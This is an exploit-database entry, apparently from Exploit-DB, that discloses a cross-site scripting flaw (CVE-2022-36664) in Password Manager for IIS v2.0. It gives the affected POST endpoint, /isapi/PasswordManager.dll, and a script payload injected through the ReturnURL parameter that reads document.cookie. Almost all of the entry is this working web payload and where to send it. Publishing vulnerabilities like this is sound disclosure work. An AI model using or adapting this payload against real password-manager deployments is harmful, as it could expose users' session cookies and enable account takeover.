Password Manager for IIS v2.0 - XSS
Author: VP4TR10T type: webapps platform: asp port: date_added: 2023-03-25 date_updated: 2023-03-25 verified: 0 codes: CVE-2022-36664 tags: aliases: screenshot_url: application_url: raw file: 51055.txt
# Exploit Title: Password Manager for IIS v2.0 - XSS # Exploit Author: VP4TR10T # Vendor Homepage: http://passwordmanager.adiscon.com/en/manual/ # Software Link: http://passwordmanager.adiscon.com/ <http://passwordmanager.adiscon.com/> # Version: *Version 2.0 # Tested on: WINDOWS # CVE : CVE-2022-36664 Affected URI (when changing user password): POST /isapi/PasswordManager.dll HTTP/1.1 Affected Parameter in http payload:*ReturnURL*=<script>alert(document.cookie)</script> *Cordially,*